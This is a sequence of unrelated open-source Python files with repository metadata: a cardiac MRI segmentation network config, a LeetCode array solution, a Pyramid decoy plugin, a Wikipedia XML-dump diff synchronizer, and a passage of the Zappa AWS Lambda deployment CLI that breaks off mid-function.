ld3a = nn.layers.dnn.Conv2DDNNLayer(l0_frames_d3, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=16, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld3b = nn.layers.dnn.Conv2DDNNLayer(ld3a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=16, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld3c = nn.layers.dnn.Conv2DDNNLayer(ld3b, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=16, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld3o = nn.layers.dnn.Conv2DDNNLayer(ld3c, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=16, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2i = nn.layers.ConcatLayer([l0_frames_d2, upsample(ld3o)], axis=1)
ld2a = nn.layers.dnn.Conv2DDNNLayer(ld2i, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2b = nn.layers.dnn.Conv2DDNNLayer(ld2a, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2c = nn.layers.dnn.Conv2DDNNLayer(ld2b, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2d = nn.layers.dnn.Conv2DDNNLayer(ld2c, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2o = nn.layers.dnn.Conv2DDNNLayer(ld2d, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1i = nn.layers.ConcatLayer([l0_frames_d1, upsample(ld2o)], axis=1)
ld1a = nn.layers.dnn.Conv2DDNNLayer(ld1i, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1b = nn.layers.dnn.Conv2DDNNLayer(ld1a, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1c = nn.layers.dnn.Conv2DDNNLayer(ld1b, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1d = nn.layers.dnn.Conv2DDNNLayer(ld1c, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1o = nn.layers.dnn.Conv2DDNNLayer(ld1d, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
dropout = lambda incoming: nn.layers.DropoutLayer(incoming, p=0.5)
ld0i = nn.layers.ConcatLayer([l0_frames_d0, upsample(ld1o)], axis=1)
ld0a = nn.layers.dnn.Conv2DDNNLayer(dropout(ld0i), W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0b = nn.layers.dnn.Conv2DDNNLayer(dropout(ld0a), W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0c = nn.layers.dnn.Conv2DDNNLayer(dropout(ld0b), W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0d = nn.layers.dnn.Conv2DDNNLayer(dropout(ld0c), W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0o = nn.layers.dnn.Conv2DDNNLayer(dropout(ld0d), W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=1, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.sigmoid)
ld0r = nn.layers.ReshapeLayer(ld0o, (batch_size * nr_slices * nr_frames_subsampled, patch_px, patch_px))
l_frames_musigma = layers.IntegrateAreaLayer(ld0r, sigma_mode='smart', sigma_scale=.1)
area_per_pixel_cm = (float(patch_mm) / float(patch_px))**2 / 100.0
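    # Sanity check on the constant: patch_mm / patch_px = 64 / 32 = 2 mm per
    # pixel, so each pixel covers 2**2 = 4 mm**2 = 0.04 cm**2.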
l_frames_musigma_cm = layers.TrainableScaleLayer(l_frames_musigma, scale=nn.init.Constant(area_per_pixel_cm), trainable=False)
# Go back to a per slice model
l_slices_musigma_cm = nn.layers.ReshapeLayer(l_frames_musigma_cm, (batch_size * nr_slices, nr_frames_subsampled, 2)) # (bxs, t, 2)
l_slices_musigma_cm_sys = layers.ArgmaxAndMaxLayer(l_slices_musigma_cm, mode='min') # (bxs, 2)
l_slices_musigma_cm_dia = layers.ArgmaxAndMaxLayer(l_slices_musigma_cm, mode='max') # (bxs, 2)
l_slices_musigma_cm_avg = layers.ArgmaxAndMaxLayer(l_slices_musigma_cm, mode='mean')
# AGGREGATE SLICES PER PATIENT
l_scaled_slice_locations = layers.TrainableScaleLayer(lin_slice_locations, scale=nn.init.Constant(0.1), trainable=False)
# Systole
l_pat_sys_ss_musigma_cm = nn.layers.ReshapeLayer(l_slices_musigma_cm_sys, (batch_size, nr_slices, 2))
l_pat_sys_ss_mu_cm = nn.layers.SliceLayer(l_pat_sys_ss_musigma_cm, indices=0, axis=-1)
l_pat_sys_ss_sigma_cm = nn.layers.SliceLayer(l_pat_sys_ss_musigma_cm, indices=1, axis=-1)
l_pat_sys_aggr_mu_sigma = layers.JeroenLayer([l_pat_sys_ss_mu_cm, l_pat_sys_ss_sigma_cm, lin_slice_mask, l_scaled_slice_locations], rescale_input=1.)
l_systole = layers.MuSigmaErfLayer(l_pat_sys_aggr_mu_sigma)
# Diastole
l_pat_dia_ss_musigma_cm = nn.layers.ReshapeLayer(l_slices_musigma_cm_dia, (batch_size, nr_slices, 2))
l_pat_dia_ss_mu_cm = nn.layers.SliceLayer(l_pat_dia_ss_musigma_cm, indices=0, axis=-1)
l_pat_dia_ss_sigma_cm = nn.layers.SliceLayer(l_pat_dia_ss_musigma_cm, indices=1, axis=-1)
l_pat_dia_aggr_mu_sigma = layers.JeroenLayer([l_pat_dia_ss_mu_cm, l_pat_dia_ss_sigma_cm, lin_slice_mask, l_scaled_slice_locations], rescale_input=1.)
l_diastole = layers.MuSigmaErfLayer(l_pat_dia_aggr_mu_sigma)
# Average
l_pat_avg_ss_musigma_cm = nn.layers.ReshapeLayer(l_slices_musigma_cm_avg, (batch_size, nr_slices, 2))
l_pat_avg_ss_mu_cm = nn.layers.SliceLayer(l_pat_avg_ss_musigma_cm, indices=0, axis=-1)
l_pat_avg_ss_sigma_cm = nn.layers.SliceLayer(l_pat_avg_ss_musigma_cm, indices=1, axis=-1)
l_pat_avg_aggr_mu_sigma = layers.JeroenLayer([l_pat_avg_ss_mu_cm, l_pat_avg_ss_sigma_cm, lin_slice_mask, l_scaled_slice_locations], rescale_input=1.)
l_mean = layers.MuSigmaErfLayer(l_pat_avg_aggr_mu_sigma)
return {
"inputs":{
"sliced:data:sax": l0,
"sliced:data:sax:is_not_padded": lin_slice_mask,
"sliced:data:sax:locations": lin_slice_locations,
},
"outputs": {
"systole": l_systole,
"diastole": l_diastole,
"average": l_mean,
},
"regularizable": {
},
}
|
317070/kaggle-heart
|
configurations/je_os_segmentandintegrate_smartsigma_dropout.py
|
Python
|
mit
| 12,565
|
# -*- coding: utf-8 -*-
# Given an unsorted integer array, find the first missing positive integer.
#
# For example,
# Given [1,2,0] return 3,
# and [3,4,-1,1] return 2.
# [1,3,4,2,5,8,9,7]
# Your algorithm should run in O(n) time and use constant space.
# Judging from the problem, we need the first (smallest) missing positive integer, so counting always starts from 1.
# The key to this problem is making good use of the subscripts, i.e. the index values.
# First pass: put each number at its matching index -- 1 at index 0, 2 at index 1, ...
# Second pass: find the first index whose value does not match; that is the first missing integer.
class Solution():
def firstMissingPositive(self, A):
i = 0
while i < len(A):
            # The swap and its guard condition are the crux
if A[i] > 0 and A[i] - 1 < len(A) and A[i] != A[A[i] - 1]:
A[A[i] - 1], A[i] = A[i], A[A[i] - 1]
else:
i += 1
for i, integer in enumerate(A):
if integer != i + 1:
return i + 1
return len(A) + 1
print(Solution().firstMissingPositive([4, 5, 8, 9, 7]))
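# Quick sanity checks against the examples from the problem statement above,
# plus the extra case noted in the comments:
assert Solution().firstMissingPositive([1, 2, 0]) == 3
assert Solution().firstMissingPositive([3, 4, -1, 1]) == 2
assert Solution().firstMissingPositive([1, 3, 4, 2, 5, 8, 9, 7]) == 6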
|
ddu7/PyLC
|
041First Missing Positive.py
|
Python
|
mit
| 1,058
|
# Copyright (c) 2014 by pyramid_decoy authors and contributors
# <see AUTHORS file>
#
# This module is part of pyramid_decoy and is released under
# the MIT License (MIT): http://opensource.org/licenses/MIT
"""Main decoy module."""
__version__ = "0.2.0"
SETTINGS_PREFIX = "decoy"
def includeme(configurator):
"""
Configure decoy plugin on pyramid application.
:param pyramid.configurator.Configurator configurator: pyramid's
configurator object
"""
configurator.registry["decoy"] = get_decoy_settings(
configurator.get_settings()
)
configurator.add_route("decoy", pattern="/*p")
configurator.add_view("pyramid_decoy.views.decoy", route_name="decoy")
def get_decoy_settings(settings):
"""
Extract decoy settings out of all.
:param dict settings: pyramid app settings
:returns: decoy settings
:rtype: dict
"""
return {
k.split(".", 1)[-1]: v
for k, v in settings.items()
if k[: len(SETTINGS_PREFIX)] == SETTINGS_PREFIX
}
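# For illustration, with hypothetical pyramid settings such as
# {"decoy.url": "http://example.com", "pyramid.reload": "true"},
# get_decoy_settings returns {"url": "http://example.com"} -- only keys
# prefixed with "decoy" are kept, with the prefix stripped off.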
|
fizyk/pyramid_decoy
|
src/pyramid_decoy/__init__.py
|
Python
|
mit
| 1,031
|
"""
Assumptions:
* Revisions appear ordered by page ASC, timestamp ASC, rev_id ASC
* The max(rev_id) and max(timestamp) of revisions represents the last revision
chronologically captured by the dump
"""
import logging
import traceback
from mw.xml_dump import Iterator, map, open_file
from ..errors import RevisionOrderError
from ..types import ProcessorStatus, Revision, Timestamp, User
from .synchronizer import Synchronizer
logger = logging.getLogger("diffengine.synchronizers.xml_dump")
class XMLDump(Synchronizer):
def __init__(self, engine, store, paths, force_config=False, **map_kwargs):
super().__init__(engine, store, force_config=force_config)
self.paths = [str(path) for path in paths]
self.map_kwargs = map_kwargs
def run(self):
def _process_dump(dump, path):
try:
for page in dump:
logger.debug("Constructing new processor for {0}:{1}"\
.format(page.namespace, page.title))
processor_status = self.store.processor_status.get(page.id,
type=self.engine.Processor.Status)
if processor_status is None:
processor_status = self.engine.Processor.Status(page.id)
processor = self.engine.processor(processor_status)
for rev in page:
if rev.id <= processor_status.last_rev_id:
logger.debug(
"Skipping revision (already processed) " +\
"{0}:{1}".format(rev.id, rev.timestamp))
continue
try:
user = User(rev.contributor.id,
rev.contributor.user_text)
delta = processor.process(rev.id, rev.timestamp,
rev.text)
revision = Revision(rev.id, rev.timestamp, page.id,
user, delta)
yield (revision, None)
except RevisionOrderError as e:
logger.error(traceback.format_exc())
logger.info("Skipping revision (out of order) " + \
"{0}:{1}".format(rev.id, rev.timestamp))
logger.debug("Finished processing page {0}:{1}"\
.format(page.namespace, page.title))
yield (processor.status, page.title)
logger.debug("Finished processing dump at {0}".format(path))
yield (path, None)
except Exception as e:
logger.error(traceback.format_exc())
raise
engine_status = self.store.engine_status.get(type=self.engine.Status)
if engine_status is None:
logger.info("Starting {0} from scratch.".format(self.engine.info()))
engine_status = self.engine.Status(self.engine.info())
max_rev_id = 0
max_timestamp = Timestamp(0)
if len(self.paths) == 1:
dump = Iterator.from_file(open_file(self.paths[0]))
rev_proc_or_paths = _process_dump(dump, self.paths[0])
else:
rev_proc_or_paths = map(self.paths, _process_dump,
**self.map_kwargs)
try:
for rev_proc_or_path, meta in rev_proc_or_paths:
if isinstance(rev_proc_or_path, Revision):
revision = rev_proc_or_path
self.store.revisions.store(revision)
self.status.stats['revisions_processed'] += 1
max_rev_id = max(revision.rev_id, max_rev_id)
max_timestamp = max(revision.timestamp, max_timestamp)
elif isinstance(rev_proc_or_path, ProcessorStatus):
processor_status = rev_proc_or_path
page_title = meta
logger.debug("Completed processing page " + \
"{0}. {1}".format(
page_title,
processor_status.stats))
self.store.processor_status.store(processor_status)
elif isinstance(rev_proc_or_path, str):
path = rev_proc_or_path
logger.info("Completed processing dump {0}".format(path))
else:
raise RuntimeError(
"Did not expect a " + \
"{0}".format(type(rev_proc_or_path)))
self.status.update(max_rev_id, max_timestamp)
self.store.engine_status.store(engine_status)
except Exception as e:
logger.error(traceback.format_exc())
raise
|
halfak/Difference-Engine
|
diffengine/synchronizers/xml_dump.py
|
Python
|
mit
| 5,555
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Zappa CLI
Deploy arbitrary Python programs as serverless Zappa applications.
"""
from __future__ import unicode_literals
from __future__ import division
import argcomplete
import argparse
import base64
import pkgutil
import botocore
import click
import collections
import hjson as json
import inspect
import importlib
import logging
import os
import pkg_resources
import random
import re
import requests
import slugify
import string
import sys
import tempfile
import time
import toml
import yaml
import zipfile
from click.exceptions import ClickException
from dateutil import parser
from datetime import datetime,timedelta
from zappa import Zappa, logger, API_GATEWAY_REGIONS
from util import (check_new_version_available, detect_django_settings,
detect_flask_apps, parse_s3_url, human_size)
CUSTOM_SETTINGS = [
'assume_policy',
'attach_policy',
'aws_region',
'delete_local_zip',
'delete_s3_zip',
'exclude',
'http_methods',
'integration_response_codes',
'method_header_types',
'method_response_codes',
'parameter_depth',
'role_name',
'touch',
]
##
# Main Input Processing
##
class ZappaCLI(object):
"""
ZappaCLI object is responsible for loading the settings,
handling the input arguments and executing the calls to the core library.
"""
# CLI
vargs = None
command = None
command_env = None
# Zappa settings
zappa = None
zappa_settings = None
load_credentials = True
# Specific settings
api_stage = None
app_function = None
aws_region = None
debug = None
prebuild_script = None
project_name = None
profile_name = None
lambda_arn = None
lambda_name = None
lambda_description = None
s3_bucket_name = None
settings_file = None
zip_path = None
handler_path = None
vpc_config = None
memory_size = None
use_apigateway = None
lambda_handler = None
django_settings = None
manage_roles = True
exception_handler = None
environment_variables = None
authorizer = None
stage_name_env_pattern = re.compile('^[a-zA-Z0-9_]+$')
def __init__(self):
self._stage_config_overrides = {} # change using self.override_stage_config_setting(key, val)
@property
def stage_config(self):
"""
A shortcut property for settings of a stage.
"""
def get_stage_setting(stage, extended_stages=None):
if extended_stages is None:
extended_stages = []
if stage in extended_stages:
raise RuntimeError(stage + " has already been extended to these settings. "
"There is a circular extends within the settings file.")
extended_stages.append(stage)
try:
stage_settings = dict(self.zappa_settings[stage].copy())
except KeyError:
raise ClickException("Cannot extend settings for undefined environment '" + stage + "'.")
extends_stage = self.zappa_settings[stage].get('extends', None)
if not extends_stage:
return stage_settings
extended_settings = get_stage_setting(stage=extends_stage, extended_stages=extended_stages)
extended_settings.update(stage_settings)
return extended_settings
settings = get_stage_setting(stage=self.api_stage)
        # Backwards compatibility for the old 'delete_zip' setting, since renamed to the more explicit 'delete_local_zip'
if u'delete_zip' in settings:
settings[u'delete_local_zip'] = settings.get(u'delete_zip')
settings.update(self.stage_config_overrides)
return settings
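    # For illustration, with hypothetical settings JSON such as
    #   {"base": {"s3_bucket": "b"}, "dev": {"extends": "base", "debug": true}}
    # stage_config for the "dev" stage yields
    #   {"s3_bucket": "b", "extends": "base", "debug": true}
    # -- the extended stage is resolved first, then overridden by the stage's own keys.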
@property
def stage_config_overrides(self):
"""
Returns zappa_settings we forcefully override for the current stage
set by `self.override_stage_config_setting(key, value)`
"""
return getattr(self, '_stage_config_overrides', {}).get(self.api_stage, {})
def override_stage_config_setting(self, key, val):
"""
Forcefully override a setting set by zappa_settings (for the current stage only)
:param key: settings key
:param val: value
"""
self._stage_config_overrides = getattr(self, '_stage_config_overrides', {})
self._stage_config_overrides.setdefault(self.api_stage, {})[key] = val
def handle(self, argv=None):
"""
Main function.
Parses command, load settings and dispatches accordingly.
"""
desc = ('Zappa - Deploy Python applications to AWS Lambda'
' and API Gateway.\n')
parser = argparse.ArgumentParser(description=desc)
parser.add_argument(
'-v', '--version', action='version',
version=pkg_resources.get_distribution("zappa").version,
help='Print the zappa version'
)
parser.add_argument(
'-a', '--app_function', help='The WSGI application function.'
)
parser.add_argument(
'-s', '--settings_file', help='The path to a Zappa settings file.'
)
env_parser = argparse.ArgumentParser(add_help=False)
group = env_parser.add_mutually_exclusive_group()
all_help = ('Execute this command for all of our defined '
'Zappa environments.')
group.add_argument('--all', action='store_true', help=all_help)
group.add_argument('command_env', nargs='?')
##
# Certify
##
subparsers = parser.add_subparsers(title='subcommands', dest='command')
cert_parser = subparsers.add_parser(
'certify', parents=[env_parser],
help='Create and install SSL certificate'
)
cert_parser.add_argument(
'--no-cleanup', action='store_true',
help=("Don't remove certificate files from /tmp during certify."
" Dangerous.")
)
##
# Deploy
##
subparsers.add_parser(
'deploy', parents=[env_parser], help='Deploy application.'
)
subparsers.add_parser('init', help='Initialize Zappa app.')
##
# Package
##
package_parser = subparsers.add_parser(
'package', parents=[env_parser], help='Build the application zip package locally.'
)
##
# Invocation
##
invoke_parser = subparsers.add_parser(
'invoke', parents=[env_parser],
help='Invoke remote function.'
)
invoke_parser.add_argument(
'--raw', action='store_true',
help=('When invoking remotely, invoke this python as a string,'
' not as a modular path.')
)
invoke_parser.add_argument('command_rest')
##
# Manage
##
manage_parser = subparsers.add_parser(
'manage',
help='Invoke remote Django manage.py commands.'
)
rest_help = ("Command in the form of <env> <command>. <env> is not "
"required if --all is specified")
manage_parser.add_argument('--all', action='store_true', help=all_help)
manage_parser.add_argument('command_rest', nargs='+', help=rest_help)
##
# Rollback
##
def positive_int(s):
""" Ensure an arg is positive """
i = int(s)
if i < 0:
msg = "This argument must be positive (got {})".format(s)
raise argparse.ArgumentTypeError(msg)
return i
rollback_parser = subparsers.add_parser(
'rollback', parents=[env_parser],
help='Rollback deployed code to a previous version.'
)
rollback_parser.add_argument(
'-n', '--num-rollback', type=positive_int, default=0,
help='The number of versions to rollback.'
)
##
# Scheduling
##
subparsers.add_parser(
'schedule', parents=[env_parser],
help='Schedule functions to occur at regular intervals.'
)
##
# Status
##
status_parser = subparsers.add_parser(
'status', parents=[env_parser],
help='Show deployment status and event schedules.'
)
status_parser.add_argument(
'--json', action='store_true',
help='Returns status in JSON format.'
) # https://github.com/Miserlou/Zappa/issues/407
##
# Log Tailing
##
tail_parser = subparsers.add_parser(
'tail', parents=[env_parser], help='Tail deployment logs.'
)
tail_parser.add_argument(
'--no-color', action='store_true',
help="Don't color log tail output."
)
tail_parser.add_argument(
'--http', action='store_true',
help='Only show HTTP requests in tail output.'
)
tail_parser.add_argument(
'--non-http', action='store_true',
help='Only show non-HTTP requests in tail output.'
)
tail_parser.add_argument(
'--since', type=str, default="100000s",
help="Only show lines since a certain timeframe."
)
tail_parser.add_argument(
'--filter', type=str, default="",
help="Apply a filter pattern to the logs."
)
##
# Undeploy
##
undeploy_parser = subparsers.add_parser(
'undeploy', parents=[env_parser], help='Undeploy application.'
)
undeploy_parser.add_argument(
'--remove-logs', action='store_true',
help=('Removes log groups of api gateway and lambda task'
' during the undeployment.'),
)
undeploy_parser.add_argument(
'-y', '--yes', action='store_true', help='Auto confirm yes.'
)
##
# Unschedule
##
subparsers.add_parser('unschedule', parents=[env_parser],
help='Unschedule functions.')
##
# Updating
##
subparsers.add_parser(
'update', parents=[env_parser], help='Update deployed application.'
)
argcomplete.autocomplete(parser)
args = parser.parse_args(argv)
self.vargs = vars(args)
# Parse the input
# NOTE(rmoe): Special case for manage command
# The manage command can't have both command_env and command_rest
# arguments. Since they are both positional arguments argparse can't
# differentiate the two. This causes problems when used with --all.
# (e.g. "manage --all showmigrations admin" argparse thinks --all has
# been specified AND that command_env='showmigrations')
# By having command_rest collect everything but --all we can split it
# apart here instead of relying on argparse.
if args.command == 'manage' and not self.vargs.get('all'):
self.command_env = self.vargs['command_rest'].pop(0)
else:
self.command_env = self.vargs.get('command_env')
self.command = args.command
# We don't have any settings yet, so make those first!
# (Settings-based interactions will fail
# before a project has been initialized.)
if self.command == 'init':
self.init()
return
# Make sure there isn't a new version available
if not self.vargs.get('json'):
self.check_for_update()
# Load and Validate Settings File
self.load_settings_file(self.vargs.get('settings_file'))
# Should we execute this for all environments, or just one?
all_environments = self.vargs.get('all')
environments = []
if all_environments: # All envs!
environments = self.zappa_settings.keys()
else: # Just one env.
if not self.command_env:
# If there's only one environment defined in the settings,
# use that as the default.
if len(self.zappa_settings.keys()) == 1:
environments.append(self.zappa_settings.keys()[0])
else:
parser.error("Please supply an environment to interact with.")
else:
environments.append(self.command_env)
for environment in environments:
try:
self.dispatch_command(self.command, environment)
except ClickException as e:
# Discussion on exit codes: https://github.com/Miserlou/Zappa/issues/407
e.show()
sys.exit(e.exit_code)
def dispatch_command(self, command, environment):
"""
Given a command to execute and environment,
execute that command.
"""
self.api_stage = environment
if command not in ['status', 'manage']:
click.echo("Calling " + click.style(command, fg="green", bold=True) + " for environment " +
click.style(self.api_stage, bold=True) + ".." )
        # Explicitly define the app function.
if self.vargs['app_function'] is not None:
self.app_function = self.vargs['app_function']
# Load our settings, based on api_stage.
try:
self.load_settings(self.vargs['settings_file'])
except ValueError as e:
print("Error: {}".format(e.message))
sys.exit(-1)
self.callback('settings')
# Hand it off
if command == 'deploy': # pragma: no cover
self.deploy()
        elif command == 'package': # pragma: no cover
self.package()
elif command == 'update': # pragma: no cover
self.update()
elif command == 'rollback': # pragma: no cover
self.rollback(self.vargs['num_rollback'])
elif command == 'invoke': # pragma: no cover
if not self.vargs.get('command_rest'):
print("Please enter the function to invoke.")
return
self.invoke(self.vargs['command_rest'], raw_python=self.vargs['raw'])
elif command == 'manage': # pragma: no cover
if not self.vargs.get('command_rest'):
print("Please enter the management command to invoke.")
return
if not self.django_settings:
print("This command is for Django projects only!")
print("If this is a Django project, please define django_settings in your zappa_settings.")
return
command_tail = self.vargs.get('command_rest')
if len(command_tail) > 1:
command = " ".join(command_tail) # ex: zappa manage dev "shell --version"
else:
command = command_tail[0] # ex: zappa manage dev showmigrations admin
self.invoke(command, command="manage")
elif command == 'tail': # pragma: no cover
self.tail(
colorize=(not self.vargs['no_color']),
http=self.vargs['http'],
non_http=self.vargs['non_http'],
since=self.vargs['since'],
filter_pattern=self.vargs['filter'],
)
elif command == 'undeploy': # pragma: no cover
self.undeploy(
noconfirm=self.vargs['yes'],
remove_logs=self.vargs['remove_logs']
)
elif command == 'schedule': # pragma: no cover
self.schedule()
elif command == 'unschedule': # pragma: no cover
self.unschedule()
elif command == 'status': # pragma: no cover
self.status(return_json=self.vargs['json'])
elif command == 'certify': # pragma: no cover
self.certify(no_cleanup=self.vargs['no_cleanup'])
##
# The Commands
##
def package(self):
"""
Only build the package
"""
# force not to delete the local zip
self.override_stage_config_setting('delete_local_zip', False)
# Execute the prebuild script
if self.prebuild_script:
self.execute_prebuild_script()
# Create the Lambda Zip
self.create_package()
self.callback('zip')
size = human_size(os.path.getsize(self.zip_path))
click.echo(click.style("Package created", fg="green", bold=True) + ": " + click.style(self.zip_path, bold=True) + " (" + size + ")")
def deploy(self):
"""
Package your project, upload it to S3, register the Lambda function
and create the API Gateway routes.
"""
# Execute the prebuild script
if self.prebuild_script:
self.execute_prebuild_script()
# Make sure this isn't already deployed.
deployed_versions = self.zappa.get_lambda_function_versions(self.lambda_name)
if len(deployed_versions) > 0:
raise ClickException("This application is " + click.style("already deployed", fg="red") +
" - did you mean to call " + click.style("update", bold=True) + "?")
# Make sure the necessary IAM execution roles are available
if self.manage_roles:
try:
self.zappa.create_iam_roles()
except botocore.client.ClientError:
raise ClickException(
click.style("Failed", fg="red") + " to " + click.style("manage IAM roles", bold=True) + "!\n" +
"You may " + click.style("lack the necessary AWS permissions", bold=True) +
" to automatically manage a Zappa execution role.\n" +
"To fix this, see here: " +
click.style("https://github.com/Miserlou/Zappa#using-custom-aws-iam-roles-and-policies", bold=True)
+ '\n')
# Create the Lambda Zip
self.create_package()
self.callback('zip')
# Upload it to S3
success = self.zappa.upload_to_s3(
self.zip_path, self.s3_bucket_name)
if not success: # pragma: no cover
raise ClickException("Unable to upload to S3. Quitting.")
# If using a slim handler, upload it to S3 and tell lambda to use this slim handler zip
if self.stage_config.get('slim_handler', False):
# https://github.com/Miserlou/Zappa/issues/510
success = self.zappa.upload_to_s3(self.handler_path, self.s3_bucket_name)
if not success: # pragma: no cover
raise ClickException("Unable to upload handler to S3. Quitting.")
# Copy the project zip to the current project zip
current_project_name = '{0!s}_current_project.zip'.format(self.project_name)
success = self.zappa.copy_on_s3(src_file_name=self.zip_path, dst_file_name=current_project_name,
bucket_name=self.s3_bucket_name)
if not success: # pragma: no cover
raise ClickException("Unable to copy the zip to be the current project. Quitting.")
handler_file = self.handler_path
else:
handler_file = self.zip_path
# Fixes https://github.com/Miserlou/Zappa/issues/613
try:
self.lambda_arn = self.zappa.get_lambda_function(
function_name=self.lambda_name)
except botocore.client.ClientError:
# Register the Lambda function with that zip as the source
# You'll also need to define the path to your lambda_handler code.
self.lambda_arn = self.zappa.create_lambda_function(
bucket=self.s3_bucket_name,
s3_key=handler_file,
function_name=self.lambda_name,
handler=self.lambda_handler,
description=self.lambda_description,
vpc_config=self.vpc_config,
timeout=self.timeout_seconds,
memory_size=self.memory_size
)
# Schedule events for this deployment
self.schedule()
endpoint_url = ''
deployment_string = click.style("Deployment complete", fg="green", bold=True) + "!"
if self.use_apigateway:
# Create and configure the API Gateway
template = self.zappa.create_stack_template(self.lambda_arn,
self.lambda_name,
self.api_key_required,
self.integration_content_type_aliases,
self.iam_authorization,
self.authorizer,
self.cors)
self.zappa.update_stack(self.lambda_name, self.s3_bucket_name, wait=True)
# Deploy the API!
api_id = self.zappa.get_api_id(self.lambda_name)
endpoint_url = self.deploy_api_gateway(api_id)
deployment_string = deployment_string + ": {}".format(endpoint_url)
# Create/link API key
if self.api_key_required:
if self.api_key is None:
self.zappa.create_api_key(api_id=api_id, stage_name=self.api_stage)
else:
self.zappa.add_api_stage_to_api_key(api_key=self.api_key, api_id=api_id, stage_name=self.api_stage)
if self.stage_config.get('touch', True):
requests.get(endpoint_url)
        # Finally, delete the local copy of our zip package
if self.stage_config.get('delete_local_zip', True):
self.remove_local_zip()
# Remove the project zip from S3.
self.remove_uploaded_zip()
self.callback('post')
click.echo(deployment_string)
def update(self):
"""
Repackage and update the function code.
"""
# Execute the prebuild script
if self.prebuild_script:
self.execute_prebuild_script()
# Temporary version check
try:
updated_time = 1472581018
function_response = self.zappa.lambda_client.get_function(FunctionName=self.lambda_name)
conf = function_response['Configuration']
last_updated = parser.parse(conf['LastModified'])
last_updated_unix = time.mktime(last_updated.timetuple())
except Exception as e:
click.echo(click.style("Warning!", fg="red") + " Couldn't get function " + self.lambda_name +
" in " + self.zappa.aws_region + " - have you deployed yet?")
sys.exit(-1)
if last_updated_unix <= updated_time:
click.echo(click.style("Warning!", fg="red") +
" You may have upgraded Zappa since deploying this application. You will need to " +
click.style("redeploy", bold=True) + " for this deployment to work properly!")
# Make sure the necessary IAM execution roles are available
if self.manage_roles:
try:
self.zappa.create_iam_roles()
except botocore.client.ClientError:
click.echo(click.style("Failed", fg="red") + " to " + click.style("manage IAM roles", bold=True) + "!")
click.echo("You may " + click.style("lack the necessary AWS permissions", bold=True) +
" to automatically manage a Zappa execution role.")
click.echo("To fix this, see here: " +
click.style("https://github.com/Miserlou/Zappa#using-custom-aws-iam-roles-and-policies",
bold=True))
sys.exit(-1)
# Create the Lambda Zip,
self.create_package()
self.callback('zip')
# Upload it to S3
success = self.zappa.upload_to_s3(self.zip_path, self.s3_bucket_name)
if not success: # pragma: no cover
raise ClickException("Unable to upload project to S3. Quitting.")
# If using a slim handler, upload it to S3 and tell lambda to use this slim handler zip
if self.stage_config.get('slim_handler', False):
# https://github.com/Miserlou/Zappa/issues/510
success = self.zappa.upload_to_s3(self.handler_path, self.s3_bucket_name)
if not success: # pragma: no cover
raise ClickException("Unable to upload handler to S3. Quitting.")
# Copy the project zip to the current project zip
current_project_name = '{0!s}_current_project.zip'.format(self.project_name)
success = self.zappa.copy_on_s3(src_file_name=self.zip_path, dst_file_name=current_project_name,
bucket_name=self.s3_bucket_name)
if not success: # pragma: no cover
raise ClickException("Unable to copy the zip to be the current project. Quitting.")
handler_file = self.handler_path
else:
handler_file = self.zip_path
# Register the Lambda function with that zip as the source
# You'll also need to define the path to your lambda_handler code.
self.lambda_arn = self.zappa.update_lambda_function(
self.s3_bucket_name, handler_file, self.lambda_name)
        # Remove the uploaded zip from S3, because it is now registered.
self.remove_uploaded_zip()
# Update the configuration, in case there are changes.
self.lambda_arn = self.zappa.update_lambda_configuration(lambda_arn=self.lambda_arn,
function_name=self.lambda_name,
handler=self.lambda_handler,
description=self.lambda_description,
vpc_config=self.vpc_config,
timeout=self.timeout_seconds,
memory_size=self.memory_size)
        # Finally, delete the local copy of our zip package
if self.stage_config.get('delete_local_zip', True):
self.remove_local_zip()
if self.use_apigateway:
self.zappa.create_stack_template(self.lambda_arn,
self.lambda_name,
self.api_key_required,
self.integration_content_type_aliases,
self.iam_authorization,
self.authorizer,
self.cors)
self.zappa.update_stack(self.lambda_name, self.s3_bucket_name, wait=True, update_only=True)
api_id = self.zappa.get_api_id(self.lambda_name)
